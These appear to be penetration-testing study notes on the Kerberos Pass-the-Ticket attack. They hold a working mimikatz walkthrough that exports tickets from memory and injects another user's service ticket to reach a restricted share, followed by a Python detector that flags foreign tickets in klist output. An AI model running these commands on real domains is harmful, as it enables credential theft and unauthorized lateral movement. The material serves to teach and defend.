Pass The Ticket (PTT)

Pass the Ticket

The Pass the Ticket attack takes advantage of the TGS (service ticket), which can be exported from one host, re-injected into a logon session elsewhere on the network, and then used to authenticate to the specific service it was issued for. In addition, if the service tickets belong to the current user, no administrative privileges are required to use them.

We will extract all the current TGT/TGS in memory and inject dave's WEB04 TGS into our session. This will allow us to access the restricted folder.

The following is an example-driven walkthrough of the attack.

```powershell
# Check whether the current user already has access to the resource.
ls \\web04\backup

# If access is denied, we escalate by borrowing another user's ticket.
# First, export all Kerberos tickets currently in memory to .kirbi files.
.\mimikatz.exe "privilege::debug" "log" "sekurlsa::tickets /export" "exit"

# Look for the ticket of interest among the exported files.
dir *.kirbi

# Pick the ticket to inject into the current session.
# example: [0;149674][email protected]
.\mimikatz.exe "kerberos::ptt [0;149674][email protected]" "exit"

# List the tickets in memory to confirm the injection.
klist

# Try accessing the resource again.
ls \\web04\backup
```
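A defender-side check that follows from the klist step above, added here as an example and not part of the original notes: after kerberos::ptt, the injected ticket's Client principal (dave) no longer matches the session's own user, and that mismatch can be spotted by parsing klist output. The klist text below is constructed for illustration; a mismatch is a strong but not conclusive indicator, since alternate-credential sessions (for example runas /netonly) also hold another principal's tickets.

```python
import re

# Constructed klist output (not captured from a real host). The logon session
# belongs to jen, but a service ticket for dave to cifs/web04 was injected with
# kerberos::ptt, so its Client principal no longer matches the session user.
SAMPLE_KLIST = """
Current LogonId is 0:0x1b4f2
Cached Tickets: (2)

#0>     Client: jen @ CORP.COM
        Server: krbtgt/CORP.COM @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 9/13/2022 5:15:42 (local)
        End Time:   9/13/2022 15:15:42 (local)
        Cache Flags: 0x1 -> PRIMARY

#1>     Client: dave @ CORP.COM
        Server: cifs/web04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 9/13/2022 5:03:21 (local)
        End Time:   9/13/2022 15:03:21 (local)
        Cache Flags: 0
"""


def parse_klist(text: str) -> list[dict]:
    """Split klist output into one dict of 'Field: value' pairs per cached ticket."""
    tickets, current = [], None
    for line in text.splitlines():
        m = re.match(r"#\d+>\s*(.*)", line)  # "#0>" starts a new ticket entry
        if m:
            current = {}
            tickets.append(current)
            line = m.group(1)
        if current is not None and ":" in line:
            key, _, value = line.strip().partition(":")
            current[key.strip()] = value.strip()
    return tickets


def foreign_tickets(tickets: list[dict], session_user: str) -> list[dict]:
    """Return tickets whose Client principal differs from the session's own user (given as 'jen' or 'CORP\\jen')."""
    user = session_user.split("\\")[-1].lower()
    hits = []
    for t in tickets:
        client = t.get("Client", "").split("@")[0].strip().lower()
        if client and client != user:
            hits.append(t)
    return hits
```

Run the same parser over the real `klist` output of each interactive session on a host to find tickets that do not belong to the logged-on user.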
